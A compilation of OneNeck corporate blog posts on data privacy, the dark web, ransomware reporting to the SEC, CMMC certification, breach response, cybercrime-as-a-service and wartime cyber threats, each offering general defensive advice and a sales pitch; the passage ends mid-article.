This approach also aids organizations in meeting various compliance requirements. With data privacy regulations (such as General Data Protection Regulation, GDPR) becoming increasingly stringent, demonstrating effective data management is crucial. Network segmentation simplifies this process by clearly defining data boundaries. When data is segmented and categorized, applying specific regulatory standards to each data type becomes easier, streamlining the compliance process. This clear delineation of data not only aids in compliance but also enhances overall security management, making it easier for organizations to identify and rectify any potential vulnerabilities within specific segments.

Reinforcing Data Privacy Defenses

As cyber threats become more sophisticated, multi-layered security systems are imperative. Advanced firewalls, Intrusion Prevention Systems (IPS), Intrusion Detection Systems (IDS), and comprehensive antivirus solutions are among these critical defenses. These components work together to create a formidable barrier against a wide range of threats.

  • Next Generation Firewalls – The role of firewalls in cybersecurity cannot be overstated. Next-generation firewalls go beyond traditional packet filtering, offering deeper inspection and control of network traffic. These firewalls analyze traffic for malicious activities and apply rules that go far beyond IP addresses and ports, offering a more nuanced defense against sophisticated attacks.
  • Real-time Threat Detection – Intrusion Prevention Systems (IPS) and Intrusion Detection Systems (IDS) provide real-time monitoring of unusual activity traversing a firewall equipped with these capabilities and enable an immediate response. These systems are essential for identifying potential threats as they occur, allowing for quick countermeasures to prevent or minimize damage.
  • Comprehensive Antivirus Solutions – Antivirus software remains a fundamental element of cybersecurity defense. However, these programs must be comprehensive, regularly updated, and capable of dealing with the latest malware and virus threats. Modern antivirus solutions should protect against known viruses and offer heuristic analysis to detect new, unknown threats.

A Data Privacy Partner You Can Rely On

While Data Privacy Week serves as a crucial reminder of the ongoing importance of protecting data, it’s vital to recognize that the principles and strategies discussed are not just for a single week but are part of a continuous effort. Let it catalyze ongoing education, strategy enhancement, and technological advancement in data security. As we step beyond this observance week, let’s all embrace the responsibility of ensuring data privacy as a fundamental aspect of our digital existence, demonstrating organizational and individual commitments to safeguarding our most valuable digital assets daily.

At OneNeck, we take a holistic approach to data privacy. We provide a broad selection of services and solution packages tailored to the specific needs of our customers. Are you in need of a partner to help administer your security demands? We’ve got your back with our comprehensive managed services suites.

Contact us today to see how we can be your data protection partner.


Dark Web Realities: Understanding Its Impact on Privacy and Security
https://www.oneneck.com/blog/dark-web-realities-understanding-impact-on-privacy-and-security/ (Fri, 22 Dec 2023)

In the vastness of the internet exists a somewhat mysterious, shadowy corner known as the dark web. Though often misunderstood, this concealed segment of the web poses significant risks to personal and corporate data security. As per a recent report, in 2023, roughly 2.7 million users accessed the dark web daily, many with nefarious intent, while others simply sought anonymity but often encountered much more than they bargained for.

Distinct from the ‘surface web’ – the part of the internet we frequently use – and the ‘deep web,’ which contains protected information like medical records and financial data, the dark web is intentionally hidden and inaccessible through standard search engines and browsers. Access requires specific software and configurations, thus creating an environment where users can remain anonymous and untraceable.

The Allure and Perils of the Dark Web

The dark web presents tantalizing but dangerous options for those accessing it. Its allure lies not just in the obscurity it offers but in the promise of freedom from oversight. This shadowy network attracts diverse users: privacy advocates seeking refuge from surveillance, journalists sharing sensitive information under the cloak of anonymity, and, unfortunately, individuals engaging in illegal activities.

However, the characteristics that make the dark web appealing also render it dangerous. This hidden corner of the internet has become a hotspot for a range of cybercriminal activities. The anonymity and lack of regulation facilitate and embolden these illicit transactions. It has been estimated that 75% of Dark Web sites are marketplaces. Another study suggests that anywhere from 2% to 5% of the global GDP is laundered on the dark web.

The dark web serves as a breeding ground for security threats, providing a hub for black-market transactions and a haven for hackers and cybercriminals. In 2021 alone, ransomware attacks were recorded every 11 seconds, causing damages upwards of $20 billion. This stark reality highlights the critical need for robust cybersecurity measures. The sale of personal and corporate data, hacking tools, and ransomware kits is rampant. As technology advances, so do the tactics and tools employed in the dark web’s shadowy corridors, making it a moving target for law enforcement and cybersecurity experts.

Corporate Data in the Crosshairs

Emerging as a distinct threat to corporate data, the dark web poses a substantial risk to the integrity and security of global businesses. Kaspersky’s research highlights this issue’s gravity, revealing an average of over 1,700 posts monthly related to the sale, purchase, or distribution of corporate databases and documents. This alarming trend includes a range of sensitive information, from confidential business strategies to private customer details, which, in the wrong hands, can lead to disastrous consequences, including identity theft, compliance failures, financial fraud, and severe reputational damage to the companies involved.

The trafficking of corporate data on the dark web has far-reaching implications that extend well beyond a breached organization. When sensitive personal data falls into the wrong hands, it can lead to a cascade of privacy violations affecting countless individuals. Customers and employees find their personal information, financial details, and identities at risk of being exploited.

Businesses bear a crucial responsibility, not just to their bottom line, but to their customers, clients, and partners, and must enact robust cybersecurity measures. This obligation includes deploying advanced security technologies, conducting thorough employee training and awareness programs, executing regular security audits, and constant preparedness via effective incident response plans. By doing so, they preserve their interests and protect the personal and financial well-being of their clients and partners from the ripple effects of data breaches.

Safeguarding Against Dark Web Dangers

Although it is challenging, organizations can deploy effective strategies and policies to help defend against the multifaceted threats of the dark web. Comprehensive protection requires a solid security foundation and an agile, dynamic approach. Some basic principles to safeguard against dark web dangers include:

  • Establish robust password protocols – Craft intricate and unique passwords for each account to minimize unauthorized breaches.
  • Enable Multi-Factor Authentication (MFA) – Implement additional verification steps to access accounts, significantly enhancing security against unauthorized access and breaches.
  • Stay current with software updates – Regular updates can prevent the exploitation of system vulnerabilities.
  • Prioritize cybersecurity education – Equip employees with the knowledge and practices to act as the first line of defense against cyber intrusions.

Cybercriminals continuously develop new tactics, and companies must respond by adopting a holistic approach. This approach includes strengthening security by employing advanced security measures, such as encryption, firewalls, and intrusion detection systems, and regularly conducting security audits to identify and address vulnerabilities.

Furthermore, developing a robust incident response plan is essential for minimizing damage during a data breach. This plan should include protocols for immediate action, communication strategies, and recovery processes.

A Partner to Help Light the Way

The challenges posed by the dark web are daunting but not insurmountable. OneNeck is here to guide you with robust cybersecurity solutions tailored to protect your personal and corporate data. Don’t wait until threats become breaches; act now.

Contact our security experts today for a Security Awareness Call and start fortifying your defenses against the ever-evolving digital threats of the dark web.


Ransomware Attacker Turns Tables: Reports Victim for Compliance Violation
https://www.oneneck.com/blog/ransomware-attacker-turns-tables-reports-victim-for-compliance-violation/ (Mon, 27 Nov 2023)

In a unique twist of events in the cybersecurity world, a ransomware attacker has crossed into uncharted territory. Exploiting a new legal loophole, they reported their victim, digital lending technology vendor MeridianLink, to the U.S. Securities and Exchange Commission (SEC) for failing to promptly disclose a breach. This case marks a significant evolution in ransomware tactics. It highlights the crucial intersection of cybersecurity, legal compliance, and corporate responsibility.

The Ransomware Attack on MeridianLink

The ransomware attacker, a group known as Alphv/BlackCat, claims to have infiltrated MeridianLink’s network on November 7th, 2023, resulting in the theft of significant amounts of customer data and operational information. While MeridianLink confirmed the cybersecurity incident, the exact timeline of the breach’s discovery and reporting remains unclear. The company claims that the attack occurred on November 10th and that the threat was quickly nullified.

MeridianLink’s official statement on the incident: “Upon discovery on the same day, we acted immediately to contain the threat and engaged a team of third-party experts to investigate the incident. Based on our investigation to date, we have identified no evidence of unauthorized access to our production platforms, and the incident has caused minimal business interruption.” The company also added that it cannot share further details due to its ongoing investigation.

Why the SEC Complaint

Since July 26th, 2023, the SEC has mandated that public companies disclose significant cyber incidents within four days. These rules went into effect in September. However, it is worth noting that the disclosure requirement takes effect on December 18th for large organizations, while smaller companies have a deadline of June 2024.

Regardless of specific dates, the intent here is clear: add another layer of pressure on cyberattack victims to give in to the demands of their attackers and pay the requested ransoms. When attackers file such complaints, companies face the possibility of bad publicity, erosion of client trust, and financial losses, as well as potential compliance and legal ramifications.

Implications for Cybersecurity and Compliance

While a cyber assailant filing a complaint to a governmental organization for an attack they are responsible for may seem a bit like an arsonist reporting a fire, this incident underscores how cybercrime is constantly evolving. Now, attackers are even leveraging legal and regulatory frameworks to their advantage. This development is a stark reminder for businesses to fortify their security defenses and remain transparent and prompt in their breach disclosure practices.

Cybersecurity and Resilience

Ultimately, this incident underscores a critical lesson for all organizations: the importance of having effective cybersecurity measures and being resilient in the face of a successful attack. It also highlights the evolving nature of cyber threats and the need for a comprehensive cybersecurity approach that encompasses both prevention and response strategies.

So, what are businesses supposed to do to meet evolving threats? Here are some key points to consider for organizations aiming to bolster cybersecurity defenses:

Proactive Cybersecurity Measures

  • Regular Risk Assessments – Organizations can stay ahead of emerging threats and vulnerabilities by continuously evaluating cybersecurity risks.
  • Advanced Threat Detection – Leveraging cutting-edge technologies to detect threats early is crucial in a landscape where attack methods constantly evolve.
  • Employee Training and Awareness – Human error can be a significant vulnerability, so empowering employees with knowledge and best practices is vital.
  • Robust Data Encryption – Encrypting sensitive data is a fundamental security practice that ensures data integrity, even in the event of unauthorized access.
  • Multi-Factor Authentication (MFA) – MFA is a critical layer in defense strategies, adding depth to access controls and reducing the risk of unauthorized entry.

Bridging Defense and Recovery

While proactive measures serve as the first line of defense, laying the groundwork for prevention, an organization’s resilience strategies are the contingency plans that take over when defenses are breached. This dynamic transition is crucial for maintaining operational continuity and upholding stakeholder trust through adversity.

A comprehensive cybersecurity approach embodies this transition, ensuring that threat prevention vigilance is complemented by incident response robustness. It guarantees that organizations not only deter potential breaches but bounce back with speed and efficiency, safeguarding their operational integrity when breached.

Resilience in the Face of Ransomware Attacks

  • Incident Response Plan – A clear and actionable incident response plan is vital for quick and effective action in a breach.
  • Rapid Response Team – A dedicated team ready to tackle cybersecurity incidents, with defined roles and responsibilities, is essential for minimizing damage and restoring operations swiftly.
  • Communication Strategy – Effective communication during and after an incident is crucial for maintaining stakeholder trust and managing reputational risks.
  • Legal and Regulatory Compliance – Understanding and adhering to legal and regulatory requirements ensures an organization’s response is effective and compliant.
  • Backup and Recovery Procedures – Regular backups and robust recovery processes are the safety nets that ensure business continuity in the face of cyber adversity.

From Compliance to Confidence with OneNeck

The MeridianLink ransomware attack, coupled with the regulatory maneuverings of the attackers, exemplifies the dual threats of modern cybersecurity: technical and compliance. OneNeck is well-versed in the dynamics of both cyber threats and compliance landscapes. Our suite of cybersecurity solutions is designed to address these challenging fronts head-on.

Contact us today to fortify defenses and align your cybersecurity strategies with today’s demands. Together, we can ensure that your organization is secure, compliant, and, above all, resilient in the face of any threat.


CMMC: Quickstart Guide to Cybersecurity Maturity Model Certification
https://www.oneneck.com/blog/cmmc-quickstart-guide-to-certification/ (Fri, 17 Nov 2023)

Cybersecurity Maturity Model Certification (CMMC) is a security framework created by the U.S. Department of Defense (DoD) to ensure companies prove their information security protocols are robust and mature enough to protect sensitive DoD data known as Controlled Unclassified Information (CUI). Understanding this framework and achieving organizational certification is an important step to winning deals and contracts.

Introduction to CMMC

What does CMMC mean?

The acronym CMMC stands for Cybersecurity Maturity Model Certification. By tying together several leading cybersecurity standards into five maturity levels ranging from basic to advanced, the CMMC program provides a verifiable roadmap for improving your organization’s security posture. To get certified, your organization must meet the criteria of at least the first level of certification.

Purpose and Goals of CMMC Certification

The goal of the CMMC certification is to deter uncontrolled access and possible misuse of crucial defense industry information residing outside the controlled federal systems. It intends to offer greater assurance to DoD that a contractor can adequately protect sensitive unclassified information at a level commensurate with your risk. Obtaining your certification establishes your firm as a reliable, diligent entity committed to cybersecurity.

CMMC Maturity Levels

CMMC 2.0—the most recent iteration of the model—has three levels of maturity that are applicable depending on the kind of information your company stores and the type of work it does. Each has its own list of requirements that build upon the level before it.

Level 1

At this initial stage, the focus is on implementing basic security measures. It includes 17 different practices that ensure companies are protecting Federal Contract Information (FCI).

Level 2

To achieve the second level, organizations must meet another 48 safeguards by embracing universally accepted best practices while incorporating relevant protective measures on Controlled Unclassified Information (CUI).

Level 3

Level 3 maturity means a company has good cyber hygiene, meaning the satisfactory application of all NIST SP 800-171 Rev.1 guidelines along with an additional seven controls, for a total of 130 required practices.

Preparation Steps for Cybersecurity Maturity Model Certification

So, what does it take to get you prepared to be CMMC certified? Working towards your Cybersecurity Maturity Model Certification (CMMC) will be much easier if you follow these pivotal steps to ensure you have all your ducks in a row.

1. Determine Your CMMC Level and Scope

Determining the appropriate CMMC level for certification involves a careful assessment of your organization’s specific circumstances, cybersecurity risks and the requirements of your contracts or projects with the DoD. Review your DoD contracts and project specifications to understand what level you need and what its requirements are. From there, determine the types of data and assets your organization will handle or have access to during DoD projects.

2. Run a Cybersecurity Practices Gap Analysis

Test current cybersecurity measures against the standard CMMC framework using a gap analysis template or similar digital tool. Pinpoint unmet practices or processes across domains like access control, asset management and incident response. Document the gaps and discuss the actions that must be taken to address them.

3. Build a System Security Plan

A system security plan (SSP) is effectively a high-level blueprint of your program in which you clearly outline how cyber safeguards are implemented across your entire environment in compliance with defined CMMC 2.0 requirements. You likely already have one in place; the next step is to update it with the information you uncovered in step two. If you don’t already have an SSP, you’ll need to build one.

4. Engage a Trusted Partner

Engaging a trusted partner can spell the difference between a smooth certification and one with lots of avoidable pitfalls. It makes sense to select a trusted CMMC third-party assessment organization (C3PAO) familiar with both best practices and potential loopholes within your specific industry sector. This partner can run cybersecurity assessments and gap analyses and ensure you and your team fully understand the expectations and requirements of certification.

The Support You Need to Get Certified

OneNeck’s security assessments are executed by a team of experts who stay on top of evolving threats, changing regulations and best practices. We help you cover all the bases so you can understand your current state, see how it measures up against the CMMC framework and take the necessary steps to get certified.

 

Contact us for a security assessment consultation.


You’ve Suffered a Breach, Now What?
https://www.oneneck.com/blog/you-suffered-a-breach-now-what/ (Wed, 08 Nov 2023)

The threat of cyber breaches looms larger than ever before. These incidents are not just occasional blips; they have become a persistent part of online existence. Last year, there were over 1800 reported breaches affecting over 400 million people, with no signs of slowing down. This reality underscores the critical need for robust preparedness and comprehensive knowledge of cybersecurity practices. Every day presents new challenges and potential threats, making it imperative for organizations to stay vigilant and proactive in their defense strategies. It’s not about if a breach will happen, but when, and how well you can respond and recover.

The Power of Preparation: Incident Response Plans

Imagine the moment you detect a breach. Your immediate instinct might be panic, but with a robust Incident Response Plan (IRP), you can ensure a swift and organized response.

Isolating affected systems is one of the first and most crucial steps. This action helps to prevent the further spread of malware or potential data leaks. It’s akin to stopping a water leak before it floods your house. By acting swiftly, you can minimize the damage and start the recovery process.

But an IRP isn’t just about immediate actions. It also covers assessing the breach’s impact, communication strategies, and post-incident reviews. It’s a comprehensive approach that looks at the incident from all angles, ensuring nothing is overlooked.

Preparation truly is the key. In the face of a cyber incident, having a plan ready to activate can be the difference between a minor hiccup and a major catastrophe. It’s the difference between feeling lost and having a clear direction. In cybersecurity, where every second counts, an Incident Response Plan is your best ally.

Maintaining Trust: The Role of Communication in Cyber Incidents

In the aftermath of a cyber breach, communication becomes a pivotal front in maintaining trust. The way an organization handles information sharing can significantly influence its reputation and the trust it has built.

Internally, it’s crucial to keep staff informed. This transparency ensures that employees, from the C-suite to the frontline, understand the breach’s implications and the remedial actions underway. This clarity prevents the spread of confusion and aligns the team’s response efforts.

Externally, the need for openness is even more critical. Customers and partners who have entrusted their data to the organization deserve to know the breach’s impact. Transparency with these stakeholders and, when necessary, the media is fundamental to maintaining the organization’s integrity. Timely and forthright communication helps manage public perception, ensuring the breach does not permanently damage the organization’s image.

Damage Control: Assessing and Recovering from a Breach

After addressing the immediate threats of a cyber breach, organizations must turn to a meticulous investigation of the incident. Like detectives reconstructing the events at a crime scene, they must identify the breach’s nature, scope and origin. Key steps include:

  • Conducting a Forensic Analysis – Tracing the attack’s pathways to assess the extent of the infiltration. This helps determine if the breach was a targeted attack or a random malware strike, which is crucial for crafting an effective defense strategy.
  • Identifying the Breach’s Source – Determining whether it was an external attack, an internal oversight, or a combination of factors. Pinpointing the cause is essential to prevent similar incidents in the future.
  • Assessing the Compromised Data – Understanding the type of data compromised to dictate the recovery strategy. The response might range from notifying affected parties to enhancing security protocols, depending on whether sensitive customer information or operational data was involved.

Navigating the Aftermath of a Breach: Technical Recovery and Legal Obligations

One of the most effective preventive measures against cyber threats is ensuring that systems are continuously updated. Software updates often include patches that address known vulnerabilities. By neglecting these updates, organizations leave their doors open to cybercriminals who are always looking for such weaknesses.

But what happens when cybersecurity preventions fail? That’s where backups and disaster recovery come into play. Think of backups as safety nets, ready to catch you when you fall. In the unfortunate event of data loss due to a breach, having a recent backup and an effective disaster recovery plan means you can restore your systems to their pre-breach state with minimal downtime. This swift restoration minimizes operational disruptions and helps maintain trust with stakeholders who expect uninterrupted service.

However, the aftermath of a breach isn’t just about technical recovery. There’s a legal landscape to navigate. Different regions have varying data protection laws, many of which mandate timely notifications to affected parties in the event of a data breach. Non-compliance can result in hefty fines and further reputational damage. Thus, being aware of and compliant with these regulations is not a mere formality; it’s an integral part of post-breach management.

Learning from a Breach: Training and Review

When the dust settles, stepping back and analyzing the incident is essential. What vulnerabilities were exploited? Were there any lapses in protocol or human errors? Answering these questions provides a roadmap for strengthening cybersecurity measures.

However, technical safeguards are just one piece of the puzzle. Human error remains one of the most significant vulnerabilities in any security system. Continuous employee training is crucial. Regular training sessions ensure that staff are aware of the latest threats and equipped with the knowledge to counteract them. From phishing scams to sophisticated malware attacks, employees should be the first line of defense, not the weakest link.

Moreover, cybersecurity training should not be a one-off event. Regular updates, refresher courses and drills can help ingrain security best practices in the organizational culture.

While technology provides the means to combat cyber threats, your employees wield these tools. Investing in their training and fostering a culture of security awareness ensures that they’re always ready, vigilant, and proactive in the face of potential breaches.

Fortify Your Organization Against a Breach

OneNeck is more than just a vendor; we’re your cybersecurity partner. Whether you are looking to strengthen your overall security posture, utilize cost-effective vCISO services, conduct comprehensive security assessments, ensure timely patching or empower your team with top-notch training, we’re here to help. Our expertise and commitment ensure that you’re prepared for today’s threats and the challenges of tomorrow.

Don’t wait for a breach to reveal the gaps in your cyber-defenses. Contact us today, and let’s work together to build a resilient and robust security framework for your organization.


Cybercrime as a Service (CaaS): The Dark Side of “as a Service”
https://www.oneneck.com/blog/caas-the-dark-side-of-as-a-service/ (Tue, 31 Oct 2023)

The “as a Service” model has undoubtedly transformed the way businesses operate. From Software as a Service (SaaS) to Infrastructure as a Service (IaaS) and Platform as a Service (PaaS), these models have been instrumental in streamlining operations and promoting innovation. Yet, lurking in the digital shadows is a more sinister iteration of this model: Cybercrime as a Service (CaaS).

Advent of CaaS: Democratizing Cybercrime

The introduction of CaaS marked a pivotal moment in the evolution of cyber threats. This model transformed cybercrime from isolated acts of digital mischief into a structured and scalable service. With CaaS, cybercrime is no longer confined to the tech-savvy elite. Instead, it has become a marketplace where malicious tools, infrastructure, and services are readily available for purchase or rent.

CaaS platforms offer a range of services, from ransomware toolkits to botnets for rent, making it alarmingly simple for individuals with limited technical knowledge to launch sophisticated cyberattacks. This shift not only increased the volume of cyberattacks (an attack every 39 seconds) but also their complexity and impact.

The primary driver behind CaaS is profit. By commodifying cybercriminal tools and services, CaaS providers have tapped into a lucrative market, catering to a growing clientele of aspiring cybercriminals. This commercial approach has led to a surge in cybercrime activities as attacks become more accessible to a broader audience.

In essence, CaaS has streamlined and professionalized the world of cybercrime. What was once a domain of individual hackers has now morphed into an organized, service-driven industry with revenue streams, customer bases and even customer support.

The Dark Web’s Marketplace

At its core, CaaS provides a platform where individuals or groups with malicious intent can offer cybercriminal tools, infrastructure, and services to other criminals for a fee. This model has dramatically democratized the world of cybercrime. Previously, launching a sophisticated cyberattack required considerable technical expertise. Now, thanks to CaaS, even those with limited technical knowledge can orchestrate advanced cyberattacks.

Cybercrime as a Service offers an array of malicious tools and services. Here’s a closer look at some of the primary offerings:

  • Ransomware as a Service – This service provides clients with ready-made ransomware toolkits. These toolkits encrypt a victim’s data and demand a ransom for its release, turning digital assets into hostages for extortion activities.
  • Exploit as a Service – These are specialized tools for targeted malware campaigns. They exploit known vulnerabilities in software and systems, allowing cybercriminals to infiltrate and compromise targeted devices or networks.
  • Phishing as a Service – This service delivers comprehensive phishing campaigns, often mimicking legitimate entities, to deceive individuals into revealing sensitive information. These campaigns steal data such as login credentials, credit card numbers, and other personal information.
  • DDoS-for-Hire – Distributed denial-of-service (DDoS) attacks are a common form of cyber-attack that overwhelms targeted websites or networks by flooding them with an excessive amount of traffic.
  • Botnets for Rent – This service offers networks of infected computers, known as ‘zombies,’ available for lease. Hackers can utilize these extensive networks to distribute spam emails, mine cryptocurrencies, or launch DDoS attacks to overwhelm targeted websites.

Economic Impact of CaaS

The rise of Cybercrime as a Service has brought about profound financial implications. The commodification of cybercriminal tools and services has not only democratized the world of cybercrime but has also turned it into a highly profitable venture. According to a report from AtlasVPN, the annual revenue generated from CaaS activities is estimated to exceed $1.6 billion.

This booming segment of the cybercrime ecosystem is not without its consequences. The ease of access to malicious tools and services has led to a sharp increase in cybercrime incidents. For businesses, this means not only direct financial losses from attacks (predicted to reach $10.5 trillion by 2025) but also potential reputational damage, which can have long-lasting effects on customer trust and brand value. Individuals also find themselves at heightened risk, facing threats to personal data and financial assets. The economic shadow cast by CaaS is vast, affecting entities ranging from large corporations to everyday internet users.

Defending Against the CaaS Threat

The commercialization and accessibility of cybercrime tools mean that threats can come from any direction and at any time. To effectively counter these threats and safeguard their digital assets, businesses need to adopt a holistic approach to cybersecurity. Combatting the menace of Cybercrime as a Service requires a comprehensive and multi-faceted approach:

  • Proactive Defense – Organizations must cultivate a culture of proactive cybersecurity measures and accountability.
  • Collaborative Engagement – It’s essential to coordinate with industry associations, law enforcement, and the broader cybersecurity community to form a united front against cyber threats.
  • Continuous Learning – By analyzing past security incidents, organizations can learn, adapt, and bolster their defense mechanisms. Additionally, training employees to be aware of threats and how to respond appropriately is critical.
  • Advanced Security Measures – Employing cutting-edge security solutions ensures real-time monitoring, swift threat detection, and rapid response.

One particularly effective way for organizations to combat the onslaught of attacks generated through CaaS is by deploying Managed Detection and Response (MDR). MDR combines sophisticated technology with artificial and human intelligence to continuously monitor your systems for threats and mitigate incidents. This security solution helps discover and intercept attacks before significant damage occurs.

Strengthening Defenses Against Security Threats

The escalating threat of Cybercrime as a Service underscores how important it is for organizations to be proactive and well-prepared. Seeking expert guidance and forming strategic partnerships can make all the difference. OneNeck offers a comprehensive suite of security solutions tailored to address the challenges of today’s cyberattacks, including those generated by CaaS. By aligning with trusted partners like OneNeck, organizations can bolster their defenses, ensuring a secure and resilient digital environment in the face of these evolving threats.

Don’t wait for a breach to happen. Contact our security experts today.

Anatomy of Wartime Cyberattacks https://www.oneneck.com/blog/anatomy-of-wartime-cyberattacks/ Wed, 18 Oct 2023 15:46:42 +0000

Cyberattacks during wartime have become a potent weapon, affecting the warring nations and regular citizens worldwide. Such shifts in cyber threats highlight the interconnected nature of our digital world, where geopolitical events in one region can have digital repercussions across the globe. A recent example underscores this global reach: the Israel-Hamas conflict has increased cyber threats even in seemingly unrelated countries like Australia. With this evolving landscape of digital warfare, it’s crucial to understand the various cyberattacks that emerge during conflicts and their potential impacts.

DoS Attacks: More Than Just Wartime Cyberattacks

Denial of Service (DoS) attacks aim to incapacitate systems vital for offensive and defensive measures. By targeting infrastructure and applications that fortify and defend, attackers can effectively blind these systems, potentially masking a physical assault. Critical systems, whether for gathering intelligence, executing attacks, or facilitating communication, can be interrupted, severely limiting or preventing retaliation. Within hours of Hamas rockets entering Israel, DoS attacks started to spring up on Palestinian and Israeli sites, including nearly 3 dozen directed at Israeli government pages.

While the average individual might not directly encounter these cyberattacks, the implications for businesses are profound. Software and hardware companies supplying defense contracts should be proactive, anticipating the need for patching vulnerabilities and assisting in recovery and restoration efforts. Alarmingly, attackers might even compromise these defense-related companies well before conflicts arise, scouting for weaknesses to exploit.

Propaganda and False Information: Manipulating the Masses

In the age of information, controlling the narrative is a powerful tool. The compromise of news websites, especially during conflict, can significantly sway public perception. With awareness of this power, attackers employ various tactics to manipulate the masses. By attempting to swing the narrative in their favor, they can elicit support for a different side or even exaggerate the gravity of situations to create panic or confusion. This deception is not just about spreading false information but crafting a storyline that serves their agenda.

Unless you’re directly involved in the security of these news organizations, you’re likely a consumer of the information they provide. In such a scenario, how do you discern fact from fiction? The key lies in diversification. It’s crucial to cross-reference information, seeking out multiple sources before placing trust in a single outlet. Doing so gives you a more holistic view of events and safeguards you against falling prey to one-sided narratives.

Moreover, in this era of digital news, consider revisiting traditional forms of journalism, such as newspapers and magazines, which often undergo rigorous editorial processes.

Deep Fakes & AI: The New Face of Deception

With advancements in deep fake technology and AI, it’s become alarmingly easy to fabricate convincing audio and video. Deep fake technology uses advanced machine learning algorithms to craft realistic yet entirely fabricated content. The possibilities are endless and frightening, from altering speeches to manipulating facial expressions. Imagine a scenario where a video surfaces online showing a nation’s leader declaring war, admitting to crimes or even expressing sympathy for the opposition.

But it’s not just about political figures. Ordinary citizens can also become targets. From creating defamatory content to blackmail, the personal repercussions of deep fakes can be devastating.

In a world where seeing once meant believing, we now find ourselves questioning the authenticity of everything we view.

So, how can one navigate this treacherous digital landscape?

  • Consider the source. Is the content coming from a reputable outlet?
  • Look for corroborating evidence. Are other trusted sources reporting the same news?
  • Stay informed. Tools and platforms that detect deep fakes are also emerging and can offer additional protection.

Phishing & Financial Scams: Exploiting the Heartstrings During Wartime

War, with its devastating images and heart-wrenching stories, naturally evokes a strong emotional response. Always looking for vulnerabilities, scammers recognize this emotional state as an opportunity. Malicious actors deceive people by pretending to be charitable organizations or creating stories of suffering and need.

You might receive an email detailing the plight of war victims, complete with poignant images and a call to action. Or a message on social media from a seemingly reputable organization urging immediate donations to help those in need. While the instinct to help is commendable, pausing and evaluating is crucial. With awareness and caution, one can avoid falling into these traps.

Before making any donations, always verify the legitimacy of the organization. It is important to take simple steps such as checking official websites, reading reviews, and examining an organization’s records. Be especially wary of unsolicited requests for funds, no matter how genuine they seem. Remember, legitimate organizations rarely, if ever, resort to aggressive or emotionally manipulative tactics.

Supply Chain Interruption: The Global Domino Effect

Disrupting the supply chain can deliver a significant advantage in wartime. Whether it’s the agricultural sector ensuring food supplies, the energy sector providing fuel, or the industries engaged in arms manufacturing and defense technology, no area is immune. The objective is clear: weaken the opposition by cutting off resources.

However, the ramifications of such attacks extend far beyond the immediate conflict. In our interconnected global economy, disruptions in one region can ripple across industries, economies and livelihoods worldwide. For instance, a cyberattack on an oil refinery could lead to fuel shortages, escalating prices and transportation disruptions across continents.

For global citizens and businesses, this presents a dual threat. On the one hand, there’s the direct risk of being targeted in cyberattacks aimed at weakening specific supply chain elements. On the other, there’s the indirect impact. As supply chains falter, essential commodities can become scarce, leading to increased living costs, shortages of items and even socio-economic unrest.

Navigating this complex scenario requires a multi-faceted approach. Governments and industries must collaborate to fortify their digital and physical infrastructures. Regular audits, cybersecurity training, and international cooperation can help mitigate risks. It’s a wake-up call for individuals to understand the vulnerabilities inherent in our globalized system. Being informed, prepared and adaptable can help reduce supply chain challenges.

Wartime Cyberattacks: Safeguarding Yourself with a Trusted Partner

The digital warfare landscape is vast and ever-evolving, impacting not just nations in conflict but resonating globally. Economies, societies, businesses and individual lives are intertwined, making the consequences of digital threats far-reaching. As we move forward, we must recognize the magnitude of these challenges and the importance of staying informed.

Awareness, vigilance, and proactive measures are not just buzzwords; they are necessities in this digital age. By understanding the threats and taking timely actions, we can safeguard our digital assets and ensure a more secure future for all.

OneNeck offers cutting-edge cybersecurity solutions tailored to your needs. Having a trusted partner can make all the difference in challenging times.

Contact us today for a comprehensive cybersecurity assessment and fortify your digital defenses.

Maintaining Cyber Vigilance in a World of Digital Threats https://www.oneneck.com/blog/maintaining-cyber-vigilance-in-a-world-of-digital-threats/ Fri, 13 Oct 2023 15:15:43 +0000

The world’s attention is spread thin from the recent unrest in the Middle East to the prolonged conflict between Ukraine and Russia and a US presidential election on the horizon. These events, while primarily political and military in nature, also significantly impact our digital world. The interconnectedness of our global society means that disruptions in one area can lead to challenges in another. As geopolitical tensions rise, the online environment becomes a new battleground for conflicts, espionage, and cyberattacks. Individuals, businesses, and nations must exercise cyber vigilance, understanding that physical borders aren’t the only boundaries at risk.

Bad actors, both state-sponsored and opportunistic hackers, are always looking for moments of vulnerability. They exploit the heightened emotions and distractions of global events to launch cyberattacks. As tensions escalated around Israel, documented cyberattacks paralleled the physical military confrontations. But it’s crucial to understand that these digital threats aren’t confined to the primary participants of these global events. Allies, supply chains, businesses and even individuals can find themselves caught in the crossfire.

Given the current state of affairs, it’s more important than ever for everyone to exhibit cyber vigilance. Here’s what you can do to safeguard your digital assets:

Cyber Vigilance Education

While it may be a cliché, knowledge truly is power when it comes to cybersecurity. It’s about having the right tools and cultivating an informed mindset to discern threats and act proactively. Understanding the attackers’ tactics and adopting a vigilant approach can significantly reduce our vulnerability to cyber threats. Here’s how you can bolster your cybersecurity knowledge:

  • Understanding Attacker Tactics

    • Stay Informed – Regularly read up on the latest cyberattack methods. Knowledge is your first line of defense.
    • Real-world Examples – Familiarize yourself with case studies of recent cyberattacks to understand their modus operandi.
  • Distrust and Verify

    • Be Skeptical – Always question unsolicited communications, especially if they ask for personal or financial information.
    • Double-check – If you receive an unexpected request, contact the person or organization directly using a verified method, like their official phone number, before taking action.
  • Formal Training with KnowBe4

    • What is it? – KnowBe4 is a platform that offers security awareness training to help organizations and individuals recognize and combat cybersecurity threats.
    • Why is it important? – With the proper training, you can identify phishing emails, malicious attachments and other threats before they become a problem.

Patch Regularly

Staying updated is not just about accessing the latest features; it’s a critical defense mechanism. Regularly updating your software protects you against known vulnerabilities that cybercriminals could exploit. Think of patches as digital armor, reinforcing your systems against potential threats. Here’s why regular updates are essential and how you can maintain them:

  • Update Computer Operating Systems

    • Stay Current – Manufacturers regularly release updates that patch vulnerabilities. Ensure you’re always using the latest version.
    • Automate – Set your system to update automatically whenever a new version is available.
    • Patch Management – Investing in patch management ensures critical updates are prioritized and applied in a timely manner.
  • Mobile Device Updates

    • Consistent Checks – Mobile devices are frequent targets. Regularly check for software updates to stay protected.
    • Beware of Third-party Stores – Only download apps from official app stores to reduce the risk of malware.
  • Application Updates

    • Why it Matters – Outdated software can have vulnerabilities that hackers exploit. Keeping them updated closes these security gaps.
    • Set Reminders – If your software doesn’t update automatically, you can use tools or set up calendar reminders to check for updates regularly. This way, you can ensure that your software is always up-to-date with the latest features and security patches.

Bolster Defenses

